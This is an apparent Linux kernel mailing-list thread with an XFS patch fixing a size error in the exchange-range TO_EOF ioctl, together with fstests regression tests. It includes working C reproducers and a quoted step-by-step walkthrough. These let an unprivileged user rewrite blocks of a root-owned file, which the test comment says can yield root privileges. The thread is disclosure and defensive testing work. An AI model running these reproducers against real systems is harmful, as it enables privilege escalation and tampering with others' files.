* [PATCH] xfs: add regression test for exchangerange-to-eof reflux
2026-10-06 5:09 [PATCH] " Darrick J. Wong
@ 2026-10-06 6:15 ` Darrick J. Wong
0 siblings, 0 replies; 8+ messages in thread
From: Darrick J. Wong @ 2026-10-06 6:15 UTC (permalink / raw)
To: Carlos Maiolino; +Cc: Norbert Szetei, linux-xfs, Christoph Hellwig, fstests
From: Darrick J. Wong <djwong@kernel.org>
This is a regression test for a bug that Norbert Szetei reported in the
XFS exchange-range ioctl. I've ported his reproducer program to
fstests so that everyone can run it, and added an extra test that
checks that the right thing happens if you ask the kernel to exchange
unequally sized tails of two files.
Cc: Norbert Szetei <norbert@doyensec.com>
Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
---
.gitignore | 1
src/Makefile | 2 -
src/xfs-exchange-to-eof.c | 168 +++++++++++++++++++++++++++++++++++++++++++++
tests/generic/1958 | 107 +++++++++++++++++++++++++++++
tests/generic/1958.out | 6 ++
5 files changed, 283 insertions(+), 1 deletion(-)
create mode 100644 src/xfs-exchange-to-eof.c
create mode 100755 tests/generic/1958
create mode 100644 tests/generic/1958.out
diff --git a/.gitignore b/.gitignore
index b5d85c9451f0a8..2bf7043d1cc7eb 100644
--- a/.gitignore
+++ b/.gitignore
@@ -186,6 +186,7 @@ tags
/src/uuid_ioctl
/src/writemod
/src/writev_on_pagefault
+/src/xfs-exchange-to-eof
/src/xfsctl
/src/xfsfind
/src/aio-dio-regress/aio-dio-append-write-fallocate-race
diff --git a/src/Makefile b/src/Makefile
index 04a73b76546241..bfbb6cd5f3c690 100644
--- a/src/Makefile
+++ b/src/Makefile
@@ -36,7 +36,7 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \
fscrypt-crypt-util bulkstat_null_ocount splice-test chprojid_fail \
detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe \
uuid_ioctl t_snapshot_deleted_subvolume fiemap-fault min_dio_alignment \
- rw_hint btrfs_ioctl refluxfs
+ rw_hint btrfs_ioctl refluxfs xfs-exchange-to-eof
EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \
btrfs_crc32c_forged_name.py popdir.pl popattr.py \
diff --git a/src/xfs-exchange-to-eof.c b/src/xfs-exchange-to-eof.c
new file mode 100644
index 00000000000000..045bb3b97ae135
--- /dev/null
+++ b/src/xfs-exchange-to-eof.c
@@ -0,0 +1,168 @@
+// SPDX-License-Identifier: GPL-2.0
+
+// Trick exchange-range-to-EOF into screwing up the file size exchange
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/vfs.h>
+#include <linux/fs.h>
+#include <linux/fiemap.h>
+#include <errno.h>
+
+#ifndef FICLONERANGE
+#define FICLONERANGE _IOW(0x94, 13, struct file_clone_range)
+#endif
+
+#ifndef XFS_EXCHANGE_RANGE_TO_EOF
+struct xfs_exchange_range {
+ __s32 file1_fd;
+ __u32 pad;
+ __u64 file1_offset;
+ __u64 file2_offset;
+ __u64 length;
+ __u64 flags;
+};
+#define XFS_IOC_EXCHANGE_RANGE _IOW('X', 129, struct xfs_exchange_range)
+#define XFS_EXCHANGE_RANGE_TO_EOF (1ULL << 0)
+#endif
+
+static unsigned long blksz;
+static int peer, f1;
+
+static unsigned long long phys(int fd, unsigned long long off)
+{
+ struct { struct fiemap f; struct fiemap_extent e[1]; } q;
+
+ memset(&q, 0, sizeof q);
+ q.f.fm_start = off;
+ q.f.fm_length = blksz;
+ q.f.fm_extent_count = 1;
+ if (ioctl(fd, FS_IOC_FIEMAP, &q.f) || q.f.fm_mapped_extents < 1)
+ return 0;
+ return (q.e[0].fe_physical + (off - q.e[0].fe_logical)) / blksz;
+}
+
+static void show(const char *tag)
+{
+ struct stat st;
+ int i;
+
+ fstat(f1, &st);
+ printf("%-26s peer [%llu] file1 size %5lld [", tag, phys(peer, 0),
+ (long long)st.st_size);
+ for (i = 0; i < 3; i++)
+ printf("%llu%s", phys(f1, (unsigned long long)i * blksz),
+ i == 2 ? "]\n" : "] [");
+}
+
+static int mkfile(const char *name, char fill, int blocks)
+{
+ char *buf;
+ int fd;
+
+ unlink(name);
+ fd = open(name, O_RDWR | O_CREAT | O_EXCL, 0600);
+ if (fd < 0)
+ return fprintf(stderr, "open %s: %m\n", name), -1;
+ buf = malloc(blocks * blksz);
+ memset(buf, fill, blocks * blksz);
+ if (pwrite(fd, buf, blocks * blksz, 0) != (ssize_t)(blocks * blksz))
+ return fprintf(stderr, "pwrite %s: %m\n", name), -1;
+ free(buf);
+ fsync(fd);
+ return fd;
+}
+
+int main(int argc, char *argv[])
+{
+ struct xfs_exchange_range xr;
+ struct file_clone_range cr;
+ char before[65536], after[65536], *buf;
+ struct statfs sfs;
+ struct stat st;
+ int d1, d2;
+
+ if (argc != 3) {
+ fprintf(stderr, "Usage: $0 dir path_to_peer\n");
+ return 2;
+ }
+
+ if (chdir(argv[1]))
+ return perror(argv[1]), 2;
+
+ if (statfs(".", &sfs))
+ return fprintf(stderr, "statfs: %m\n"), 2;
+ blksz = sfs.f_bsize;
+ if (blksz < 512 || blksz > 65536)
+ return fprintf(stderr, "unexpected block size %lu\n", blksz), 2;
+
+ peer = open(argv[2], O_RDONLY);
+ if (peer < 0)
+ return fprintf(stderr, "open peer %s: %m\n", argv[2]), 2;
+ syncfs(peer); /* so FIEMAP reports peer's real blocks */
+ fstat(peer, &st);
+ printf("peer uid %u mode %04o size %lld, block size %lu\n\n",
+ st.st_uid, st.st_mode & 07777, (long long)st.st_size, blksz);
+ if (pread(peer, before, blksz, 0) != (ssize_t)blksz)
+ return fprintf(stderr, "read peer: %m\n"), 2;
+
+ f1 = mkfile("file1", 'A', 3);
+ d1 = mkfile("donor1", 'B', 1);
+ d2 = mkfile("donor2", 'C', 1);
+ if (f1 < 0 || d1 < 0 || d2 < 0)
+ return 2;
+ show("start");
+
+ /* 1. share peer's block into the middle of file1 */
+ cr = (struct file_clone_range){ .src_fd = peer, .src_offset = 0,
+ .src_length = blksz,
+ .dest_offset = blksz };
+ if (ioctl(f1, FICLONERANGE, &cr))
+ return fprintf(stderr, "FICLONERANGE: %m\n"), 2;
+ show("1 FICLONERANGE");
+
+ /*
+ * 2. exchange file1's last block against the whole of donor1 with
+ * TO_EOF. The sizes are exchanged too, so file1 claims one block
+ * while still owning three. file2_offset is block 2, so this exchange
+ * cannot clear a reflink flag.
+ */
+ xr = (struct xfs_exchange_range){ .file1_fd = d1, .file1_offset = 0,
+ .file2_offset = 2 * blksz,
+ .length = 0,
+ .flags = XFS_EXCHANGE_RANGE_TO_EOF };
+ if (ioctl(f1, XFS_IOC_EXCHANGE_RANGE, &xr))
+ return fprintf(stderr, "EXCHANGE_RANGE TO_EOF: %m\n"), 2;
+ show("2 EXCHANGE_RANGE TO_EOF");
+
+ /*
+ * 3. by i_disk_size this is a whole-file exchange of two one-block
+ * files, so the reflink flag is handed to donor2 and cleared off
+ * file1, which still shares a block with peer.
+ */
+ xr = (struct xfs_exchange_range){ .file1_fd = d2, .file1_offset = 0,
+ .file2_offset = 0, .length = blksz };
+ if (ioctl(f1, XFS_IOC_EXCHANGE_RANGE, &xr))
+ return fprintf(stderr, "EXCHANGE_RANGE: %m\n"), 2;
+ show("3 EXCHANGE_RANGE");
+
+ /* 4. write to the block file1 still shares with peer */
+ buf = malloc(blksz);
+ memset(buf, 'X', blksz);
+ if (pwrite(f1, buf, blksz, blksz) != (ssize_t)blksz)
+ return fprintf(stderr, "pwrite: %m\n"), 2;
+ fsync(f1);
+ show("4 pwrite(file1, 4096)");
+
+ posix_fadvise(peer, 0, 0, POSIX_FADV_DONTNEED);
+ if (pread(peer, after, blksz, 0) != (ssize_t)blksz)
+ return fprintf(stderr, "re-read peer: %m\n"), 2;
+ printf("\npeer first byte %c -> %c %s\n", before[0], after[0],
+ memcmp(before, after, blksz) ? "PEER REWRITTEN" : "peer intact");
+ return memcmp(before, after, blksz) ? 0 : 1;
+}
diff --git a/tests/generic/1958 b/tests/generic/1958
new file mode 100755
index 00000000000000..7adfa1aee768ca
--- /dev/null
+++ b/tests/generic/1958
@@ -0,0 +1,107 @@
+#! /bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (c) 2026 Oracle. All Rights Reserved.
+#
+# FS QA Test No. 1958
+#
+# Regression test for an exchange-range-to-EOF bug which unintentionally
+# results in files that share data blocks but don't have the reflink flag set.
+# This enables attackers to rewrite shared blocks to gain root privileges,
+# similar to refluxfs.
+. ./common/preamble
+_begin_fstest auto quick fiexchange
+
+. ./common/filter
+. ./common/reflink
+
+_require_test_program "xfs-exchange-to-eof"
+_require_user fsgqa
+_require_group fsgqa
+_require_scratch_reflink
+_require_xfs_io_command exchangerange
+_require_cp_reflink
+
+_fixed_by_fs_commit xfs XXXXXXXXXXXXXX \
+ "xfs: fix exchange-range-to-eof file size exchange"
+
+_scratch_mkfs >> $seqres.full
+_scratch_mount
+
+rootdir=$SCRATCH_MNT/root
+userdir=$SCRATCH_MNT/user
+blksz=$(_get_file_block_size $SCRATCH_MNT)
+
+# Fill $mnt/peer with "P", run reproducer program
+mkdir -p $rootdir $userdir
+$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer.copy >> $seqres.full
+$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer >> $seqres.full
+sync
+
+chown $qa_user:$qa_group $userdir
+chmod +r $rootdir/peer
+
+_su $qa_user -c "$here/src/xfs-exchange-to-eof $userdir $rootdir/peer" &> $tmp.out
+
+# Now do an exchange where the distance between the offset and EOF are
+# different for the two files.
+l1sz=12345678 # file size for lopsided1
+l2sz=1234567 # file size for lopsided2
+
+l1rem=$((l1sz % 1048576))
+l2rem=$((l2sz % 65536))
+
+l1off=$((l1sz - l1rem)) # lopsided1 size rounded down to 1M
+l2off=$((l2sz - l2rem)) # lopsided2 size rounded down to 64k
+
+$XFS_IO_PROG -f -c "pwrite -S 0x58 0 $l1sz" $rootdir/lopsided1 >> $seqres.full
+$XFS_IO_PROG -f -c "pwrite -S 0x59 0 $l2sz" $rootdir/lopsided2 >> $seqres.full
+
+$XFS_IO_PROG -f \
+ -c "pwrite -S 0x58 0 $l1off" \
+ -c "pwrite -S 0x59 $l1off $l2rem" \
+ $rootdir/lopsided1.copy >> $seqres.full
+$XFS_IO_PROG -f \
+ -c "pwrite -S 0x59 0 $l2off" \
+ -c "pwrite -S 0x58 $l2off $l1rem" \
+ $rootdir/lopsided2.copy >> $seqres.full
+sync
+
+$XFS_IO_PROG -c "exchangerange -d $l1off -s $l2off -t $rootdir/lopsided2" \
+ $rootdir/lopsided1 >> $seqres.full
+
+# Check for file corruption
+grep -q REWRITTEN $tmp.out && \
+ echo "$rootdir/peer rewritten, filesystem corrupt!"
+cat $tmp.out >> $seqres.full
+
+cmp -s $rootdir/peer.copy $rootdir/peer || \
+ echo "$rootdir/peer changed since its snapshot, filesystem corrupt!"
+
+stat -c '%n:%s' $rootdir/lopsided[12] | _filter_scratch
+
+cmp -s $rootdir/lopsided1.copy $rootdir/lopsided1 || \
+ echo "$rootdir/lopsided1 is wrong, filesystem corrupt"
+cmp -s $rootdir/lopsided2.copy $rootdir/lopsided2 || \
+ echo "$rootdir/lopsided2 is wrong, filesystem corrupt"
+
+# Check reflink flags
+_scratch_unmount
+_scratch_xfs_db -c "path /user/file1" -c 'print' | grep v3.reflink
+_scratch_mount
+
+# Check for file corruption now that we've blown away all caches
+grep -q REWRITTEN $tmp.out && \
+ echo "$rootdir/peer rewritten, filesystem corrupt!"
+cat $tmp.out >> $seqres.full
+
+cmp -s $rootdir/peer.copy $rootdir/peer || \
+ echo "$rootdir/peer changed since its snapshot, filesystem corrupt!"
+
+stat -c '%n:%s' $rootdir/lopsided[12] | _filter_scratch
+
+cmp -s $rootdir/lopsided1.copy $rootdir/lopsided1 || \
+ echo "$rootdir/lopsided1 is wrong, filesystem corrupt"
+cmp -s $rootdir/lopsided2.copy $rootdir/lopsided2 || \
+ echo "$rootdir/lopsided2 is wrong, filesystem corrupt"
+
+_exit 0
diff --git a/tests/generic/1958.out b/tests/generic/1958.out
new file mode 100644
index 00000000000000..f241bb075349e9
--- /dev/null
+++ b/tests/generic/1958.out
@@ -0,0 +1,6 @@
+QA output created by 1958
+SCRATCH_MNT/root/lopsided1:11589255
+SCRATCH_MNT/root/lopsided2:1990990
+v3.reflink = 1
+SCRATCH_MNT/root/lopsided1:11589255
+SCRATCH_MNT/root/lopsided2:1990990
^ permalink raw reply related [flat|nested] 8+ messages in thread
* [PATCH v2] xfs: fix exchange-range-to-eof file size exchange
@ 2026-10-07 17:02 Darrick J. Wong
2026-10-07 17:04 ` [PATCH] xfs: add regression test for exchangerange-to-eof reflux Darrick J. Wong
` (2 more replies)
0 siblings, 3 replies; 8+ messages in thread
From: Darrick J. Wong @ 2026-10-07 17:02 UTC (permalink / raw)
To: Carlos Maiolino; +Cc: Norbert Szetei, linux-xfs, Christoph Hellwig
From: Darrick J. Wong <djwong@kernel.org>
Norbert Szetei posted a patch containing an incomplete description of a
bug in XFS_IOC_EXCHANGE_RANGE's TO_EOF flag. The bug tricks
exchange-range into modifying a file so that it has shared blocks
starting beyond EOF, which is never allowed because files never have
written data beyond EOF, and you can only share written data blocks.
This is key to all the incorrect behavior that follows.
Eventually I got from Norbert a description of what's going wrong:
> Fair. Here it is with physical block numbers, 4k blocks. peer is the file
> that gets rewritten and file1 is the one that ends up with the flag
> cleared.
>
> Start, nothing shared:
>
> peer size 4096 -> [100]
> file1 size 12288 -> [200] [201] [202]
> donor1 size 4096 -> [300]
> donor2 size 4096 -> [400]
>
> 1. FICLONERANGE peer's block into file1's middle slot:
>
> peer size 4096 -> [100]
> file1 size 12288 -> [200] [100] [202] reflink flag set
> ^^^^^ both files own block 100
>
> 2. XFS_IOC_EXCHANGE_RANGE file1 against donor1, file1_offset 0,
> file2_offset 8192, length 0, TO_EOF. One block is exchanged, and the sizes
> are exchanged with it:
>
> file1 size 4096 -> [200] [100] [300] reflink flag set
> ^^^^^^^^^^^ still owned, now past the size
> donor1 size 12288 -> [202]
>
> file1 says it is one block long while it still owns three. Nothing was
> unmapped. file2_offset is block 2, so this exchange cannot clear a flag.
>
> 3. XFS_IOC_EXCHANGE_RANGE file1 against donor2, both offsets 0, length 4096.
> By i_disk_size this is two one-block files exchanging everything, so
> xmi_can_exchange_reflink_flags() agrees and the flag is cleared:
>
> file1 size 4096 -> [400] [100] [300] reflink flag CLEARED
> donor2 size 4096 -> [200]
>
> Block 100 is still shared with peer.
>
> 4. pwrite(file1, 4096, 4096), which is file1's second slot, block 100.
> xfs_is_cow_inode(file1) is false, so no CoW:
>
> peer size 4096 -> [100] same block, new contents
>
> Block 100 is the only one that matters here. PoC below, it reads a file
> called peer in the current directory. The filesystem needs reflink and
> exchange-range, which mkfs.xfs 7.x turns on by default.
So yes, TO_EOF is screwing up the file size even if it's actually
exchanging the data block correctly. The following is the intended
behavior of XFS_EXCHANGE_RANGE_TO_EOF, as described by its manpage:
"Ignore the length parameter. All bytes in file1_fd from file1_offset
to EOF are moved to file2_fd, and file2's size is set to
(file2_offset+(file1_length-file1_offset)). Meanwhile, all bytes in
file2 from file2_offset to EOF are moved to file1 and file1's size is
set to (file1_offset+(file2_length-file2_offset))."
In other words, if we only exchange a portion of the file data, then we
should only exchange the portion of the file size that relates to the
exchanged data. Unfortunately, the code swaps the ondisk file size and
the incore file sizes, which is incorrect if the caller passes in a
nonzero offset.
Having confused the file sizes, the PoC uses a second exchange-range
call on what looks like a non-reflinked single-block file. Because the
file size is set incorrectly, exchange-range thinks it's exchanging the
full contents of two files and clears the reflink flag on the broken
file. That enables an extending write of the broken file to rewrite the
shared block that's just past EOF. This has become known colloquially
as refluxfs.
Once the file sizes are set correctly, the second exchange-range no
longer thinks that it's doing a full-contents swap, so it won't clear
the reflink flag on either of its file arguments.
Norbert followed up to an earlier version of this patch with a second
complaint about us not handling the i_disk_size state correctly:
> The offsets are bounded against the incore i_size but subtracted from
> the ondisk i_disk_size, so a file that has not been written back gives
> xmi_isize1 = 0 + (0 - 12288).
>
> For instance, you can do:
>
> $ xfs_io -f -c "pwrite -q 0 4096" -c fsync file1
> $ xfs_io -f -c "pwrite -q 0 12288" \
> -c "exchangerange -s 0 -d 12288 file1" dirty
> $ stat -c %s file1
> 0
> $ stat -c %i file1
> 131
> $ sudo xfs_io -r -c "bulkstat_single 131" . | grep bs_size
> bs_size = 18446744073709539328
That's wrong, and the new file size update logic depends on the ondisk
i_disk_size matching the incore i_size, so flush the pagecache as needed
to push it upwards.
Link: https://lore.kernel.org/linux-xfs/1E196589-DEBE-40AC-AFEA-D420DAAB067F@doyensec.com/
Reported-by: Norbert Szetei <norbert@doyensec.com>
Cc: <stable@vger.kernel.org> # v6.10
Fixes: 966ceafc7a4371 ("xfs: create deferred log items for file mapping exchanges")
Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
---
v2: fix flushing of i_disk_size too
---
fs/xfs/libxfs/xfs_exchmaps.c | 13 +++++++++--
fs/xfs/xfs_exchrange.c | 51 ++++++++++++++++++++++++++++++------------
2 files changed, 48 insertions(+), 16 deletions(-)
diff --git a/fs/xfs/libxfs/xfs_exchmaps.c b/fs/xfs/libxfs/xfs_exchmaps.c
index 6a66b6075e0af4..20bc74f47127c3 100644
--- a/fs/xfs/libxfs/xfs_exchmaps.c
+++ b/fs/xfs/libxfs/xfs_exchmaps.c
@@ -987,6 +987,7 @@ xfs_exchmaps_init_intent(
const struct xfs_exchmaps_req *req)
{
struct xfs_exchmaps_intent *xmi;
+ struct xfs_mount *mp = req->ip1->i_mount;
unsigned int rs = 0;
xmi = kmem_cache_zalloc(xfs_exchmaps_intent_cache,
@@ -1005,10 +1006,18 @@ xfs_exchmaps_init_intent(
return xmi;
}
+ /*
+ * If the caller wanted, set each file's size to that file's exchange
+ * offset + length exchanged from the other file because the ranges in
+ * each file might be different lengths.
+ */
if (req->flags & XFS_EXCHMAPS_SET_SIZES) {
+ loff_t off1 = XFS_FSB_TO_B(mp, xmi->xmi_startoff1);
+ loff_t off2 = XFS_FSB_TO_B(mp, xmi->xmi_startoff2);
+
xmi->xmi_flags |= XFS_EXCHMAPS_SET_SIZES;
- xmi->xmi_isize1 = req->ip2->i_disk_size;
- xmi->xmi_isize2 = req->ip1->i_disk_size;
+ xmi->xmi_isize1 = off1 + (req->ip2->i_disk_size - off2);
+ xmi->xmi_isize2 = off2 + (req->ip1->i_disk_size - off1);
}
/* Record the state of each inode's reflink flag before the op. */
diff --git a/fs/xfs/xfs_exchrange.c b/fs/xfs/xfs_exchrange.c
index fafb4e3f065c75..935b561dfd3c5c 100644
--- a/fs/xfs/xfs_exchrange.c
+++ b/fs/xfs/xfs_exchrange.c
@@ -290,17 +290,20 @@ xfs_exchrange_mappings(
goto out_unlock;
/*
- * If the caller wanted us to exchange the contents of two complete
- * files of unequal length, exchange the incore sizes now. This should
- * be safe because we flushed both files' page caches, exchanged all
- * the mappings, and updated the ondisk sizes.
+ * If the caller wanted, set each file's size to that file's exchange
+ * offset + length exchanged from the other file because the ranges in
+ * each file might be different lengths. This should be safe because
+ * we flushed both files' page caches, exchanged all the mappings, and
+ * updated the ondisk sizes.
*/
if (fxr->flags & XFS_EXCHANGE_RANGE_TO_EOF) {
- loff_t temp;
+ loff_t old_ip1_size = i_size_read(VFS_I(ip1));
+ loff_t old_ip2_size = i_size_read(VFS_I(ip2));
- temp = i_size_read(VFS_I(ip2));
- i_size_write(VFS_I(ip2), i_size_read(VFS_I(ip1)));
- i_size_write(VFS_I(ip1), temp);
+ i_size_write(VFS_I(ip2), fxr->file2_offset +
+ (old_ip1_size - fxr->file1_offset));
+ i_size_write(VFS_I(ip1), fxr->file1_offset +
+ (old_ip2_size - fxr->file2_offset));
}
out_unlock:
@@ -445,6 +448,30 @@ xfs_exchange_range_checks(
return blen == fxr->length ? 0 : -EINVAL;
}
+/* Flush all relevant dirty pagecache near the range to be exchanged. */
+static inline int
+xfs_exchange_range_flush(
+ struct xfs_inode *ip,
+ const struct xfs_exchrange *fxr,
+ loff_t offset)
+{
+ /*
+ * If TO_EOF is set, the ondisk file size update logic depends on the
+ * ondisk file size matching the incore file size. Flush everything.
+ */
+ if (fxr->flags & XFS_EXCHANGE_RANGE_TO_EOF)
+ return filemap_write_and_wait(VFS_I(ip)->i_mapping);
+
+ /*
+ * Because we're updating the ondisk mappings, flush all dirty data
+ * between the ondisk size and the exchange offset to reduce the chance
+ * of zeroed file contents in that gap after a crash.
+ */
+ return filemap_write_and_wait_range(VFS_I(ip)->i_mapping,
+ min(offset, ip->i_disk_size),
+ offset + fxr->length - 1);
+}
+
/*
* Check that the two inodes are eligible for range exchanges, the ranges make
* sense, and then flush all dirty data. Caller must ensure that the inodes
@@ -470,15 +497,11 @@ xfs_exchange_range_prep(
if (!same_inode)
inode_dio_wait(inode2);
- error = filemap_write_and_wait_range(inode1->i_mapping,
- fxr->file1_offset,
- fxr->file1_offset + fxr->length - 1);
+ error = xfs_exchange_range_flush(XFS_I(inode1), fxr, fxr->file1_offset);
if (error)
return error;
- error = filemap_write_and_wait_range(inode2->i_mapping,
- fxr->file2_offset,
- fxr->file2_offset + fxr->length - 1);
+ error = xfs_exchange_range_flush(XFS_I(inode2), fxr, fxr->file2_offset);
if (error)
return error;
^ permalink raw reply related [flat|nested] 8+ messages in thread
* [PATCH] xfs: add regression test for exchangerange-to-eof reflux
2026-10-07 17:02 [PATCH v2] xfs: fix exchange-range-to-eof file size exchange Darrick J. Wong
@ 2026-10-07 17:04 ` Darrick J. Wong
2026-10-07 17:05 ` [PATCH] xfs: add regression test for swapext reflux Darrick J. Wong
2026-10-07 20:35 ` [PATCH v2] xfs: fix exchange-range-to-eof file size exchange Dave Chinner
2 siblings, 0 replies; 8+ messages in thread
From: Darrick J. Wong @ 2026-10-07 17:04 UTC (permalink / raw)
To: Zorro Lang
Cc: Carlos Maiolino, Norbert Szetei, linux-xfs, Christoph Hellwig,
fstests
From: Darrick J. Wong <djwong@kernel.org>
This is a regression test for a bug that Norbert Szetei reported in the
XFS exchange-range ioctl. I've ported his reproducer program to
fstests so that everyone can run it, and added an extra test that
checks that the right thing happens if you ask the kernel to exchange
unequally sized tails of two files.
Cc: Norbert Szetei <norbert@doyensec.com>
Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
---
v2: add second repro for broken first patch
---
.gitignore | 2
src/Makefile | 3 -
src/xfs-exchange-to-dirty-eof.c | 210 +++++++++++++++++++++++++++++++++++++++
src/xfs-exchange-to-eof.c | 168 +++++++++++++++++++++++++++++++
tests/generic/1958 | 138 ++++++++++++++++++++++++++
tests/generic/1958.out | 11 ++
6 files changed, 531 insertions(+), 1 deletion(-)
create mode 100644 src/xfs-exchange-to-dirty-eof.c
create mode 100644 src/xfs-exchange-to-eof.c
create mode 100755 tests/generic/1958
create mode 100644 tests/generic/1958.out
diff --git a/.gitignore b/.gitignore
index b5d85c9451f0a8..cdcfa06e111974 100644
--- a/.gitignore
+++ b/.gitignore
@@ -186,6 +186,8 @@ tags
/src/uuid_ioctl
/src/writemod
/src/writev_on_pagefault
+/src/xfs-exchange-to-eof
+/src/xfs-exchange-dirty-to-eof
/src/xfsctl
/src/xfsfind
/src/aio-dio-regress/aio-dio-append-write-fallocate-race
diff --git a/src/Makefile b/src/Makefile
index 04a73b76546241..211b16a832ad5d 100644
--- a/src/Makefile
+++ b/src/Makefile
@@ -36,7 +36,8 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \
fscrypt-crypt-util bulkstat_null_ocount splice-test chprojid_fail \
detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe \
uuid_ioctl t_snapshot_deleted_subvolume fiemap-fault min_dio_alignment \
- rw_hint btrfs_ioctl refluxfs
+ rw_hint btrfs_ioctl refluxfs xfs-exchange-to-eof \
+ xfs-exchange-to-dirty-eof
EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \
btrfs_crc32c_forged_name.py popdir.pl popattr.py \
diff --git a/src/xfs-exchange-to-dirty-eof.c b/src/xfs-exchange-to-dirty-eof.c
new file mode 100644
index 00000000000000..2b0497c027707f
--- /dev/null
+++ b/src/xfs-exchange-to-dirty-eof.c
@@ -0,0 +1,210 @@
+// SPDX-License-Identifier: GPL-2.0
+/*
+ * Clears XFS_DIFLAG2_REFLINK from a file that still owns a shared block, on a
+ * kernel carrying "xfs: fix exchange-range-to-eof file size exchange".
+ *
+ * Needs reflink=1 and exchange=1, and a readable file called "peer" in the
+ * current directory. Brackets are physical block numbers from FIEMAP.
+ * Exits 0 if peer was rewritten, 1 if it survived, 2 on a setup error.
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/vfs.h>
+#include <linux/fs.h>
+#include <linux/fiemap.h>
+#include <errno.h>
+
+#ifndef FICLONERANGE
+#define FICLONERANGE _IOW(0x94, 13, struct file_clone_range)
+#endif
+
+#ifndef XFS_EXCHANGE_RANGE_TO_EOF
+struct xfs_exchange_range {
+ __s32 file1_fd;
+ __u32 pad;
+ __u64 file1_offset;
+ __u64 file2_offset;
+ __u64 length;
+ __u64 flags;
+};
+#define XFS_IOC_EXCHANGE_RANGE _IOW('X', 129, struct xfs_exchange_range)
+#define XFS_EXCHANGE_RANGE_TO_EOF (1ULL << 0)
+#endif
+
+static unsigned long blksz;
+static int peer, f1;
+
+static unsigned long long phys(int fd, unsigned long long off)
+{
+ struct { struct fiemap f; struct fiemap_extent e[1]; } q;
+
+ memset(&q, 0, sizeof q);
+ q.f.fm_start = off;
+ q.f.fm_length = blksz;
+ q.f.fm_extent_count = 1;
+ if (ioctl(fd, FS_IOC_FIEMAP, &q.f) || q.f.fm_mapped_extents < 1)
+ return 0;
+ return (q.e[0].fe_physical + (off - q.e[0].fe_logical)) / blksz;
+}
+
+static void show(const char *tag)
+{
+ struct stat st;
+ int i;
+
+ fstat(f1, &st);
+ printf("%-28s peer [%llu] file1 isize %5lld [", tag, phys(peer, 0),
+ (long long)st.st_size);
+ for (i = 0; i < 3; i++)
+ printf("%llu%s", phys(f1, (unsigned long long)i * blksz),
+ i == 2 ? "]\n" : "] [");
+}
+
+/* fsync == 0 leaves every block dirty, so i_disk_size stays 0 */
+static int mkfile(const char *name, char fill, int blocks, int do_fsync)
+{
+ char *buf;
+ int fd;
+
+ unlink(name);
+ fd = open(name, O_RDWR | O_CREAT | O_EXCL, 0600);
+ if (fd < 0)
+ return fprintf(stderr, "open %s: %m\n", name), -1;
+ buf = malloc((size_t)blocks * blksz);
+ memset(buf, fill, (size_t)blocks * blksz);
+ if (pwrite(fd, buf, (size_t)blocks * blksz, 0) !=
+ (ssize_t)((size_t)blocks * blksz))
+ return fprintf(stderr, "pwrite %s: %m\n", name), -1;
+ free(buf);
+ if (do_fsync)
+ fsync(fd);
+ return fd;
+}
+
+static int exchange(int fd2, int fd1, unsigned long long off1,
+ unsigned long long off2, unsigned long long len,
+ unsigned long long flags, const char *what)
+{
+ struct xfs_exchange_range xr;
+
+ memset(&xr, 0, sizeof xr);
+ xr.file1_fd = fd1;
+ xr.file1_offset = off1;
+ xr.file2_offset = off2;
+ xr.length = len;
+ xr.flags = flags;
+ if (ioctl(fd2, XFS_IOC_EXCHANGE_RANGE, &xr)) {
+ fprintf(stderr, "%s: %m\n", what);
+ return -1;
+ }
+ return 0;
+}
+
+int main(int argc, char *argv[])
+{
+ struct file_clone_range cr;
+ char before[65536], after[65536], *buf;
+ struct statfs sfs;
+ struct stat st;
+ int dirty, d2;
+
+ if (argc != 3) {
+ fprintf(stderr, "Usage: $0 dir path_to_peer\n");
+ return 2;
+ }
+
+ if (chdir(argv[1]))
+ return perror(argv[1]), 2;
+
+ if (statfs(".", &sfs))
+ return fprintf(stderr, "statfs: %m\n"), 2;
+ blksz = sfs.f_bsize;
+ if (blksz < 512 || blksz > 65536)
+ return fprintf(stderr, "unexpected block size %lu\n", blksz), 2;
+
+ peer = open(argv[2], O_RDONLY);
+ if (peer < 0)
+ return fprintf(stderr, "open peer: %m\n"), 2;
+ if (fstat(peer, &st))
+ return fprintf(stderr, "fstat peer: %m\n"), 2;
+ printf("peer uid %u mode 0%o size %lld, block size %lu\n",
+ st.st_uid, st.st_mode & 07777, (long long)st.st_size, blksz);
+ if ((unsigned long)st.st_size < blksz)
+ return fprintf(stderr,
+ "peer must be at least one block\n"), 2;
+ if (pread(peer, before, blksz, 0) != (ssize_t)blksz)
+ return fprintf(stderr, "pread peer: %m\n"), 2;
+ syncfs(peer);
+
+ /* file1: three blocks, clean, so its own i_disk_size is honest */
+ f1 = mkfile("file1", 'A', 3, 1);
+ if (f1 < 0)
+ return 2;
+ /* the lever: one block, entirely dirty, i_disk_size == 0 */
+ dirty = mkfile("dirty", 'D', 1, 0);
+ if (dirty < 0)
+ return 2;
+ d2 = mkfile("donor2", 'E', 1, 1);
+ if (d2 < 0)
+ return 2;
+ printf("\n");
+ show("start");
+
+ /* share peer's block into file1's middle block */
+ memset(&cr, 0, sizeof cr);
+ cr.src_fd = peer;
+ cr.src_offset = 0;
+ cr.src_length = blksz;
+ cr.dest_offset = blksz;
+ if (ioctl(f1, FICLONERANGE, &cr)) {
+ fprintf(stderr, "FICLONERANGE: %m\n");
+ if (errno == EOPNOTSUPP)
+ fprintf(stderr,
+ "this filesystem needs reflink=1, check xfs_info\n");
+ return 2;
+ }
+ show("1 FICLONERANGE");
+
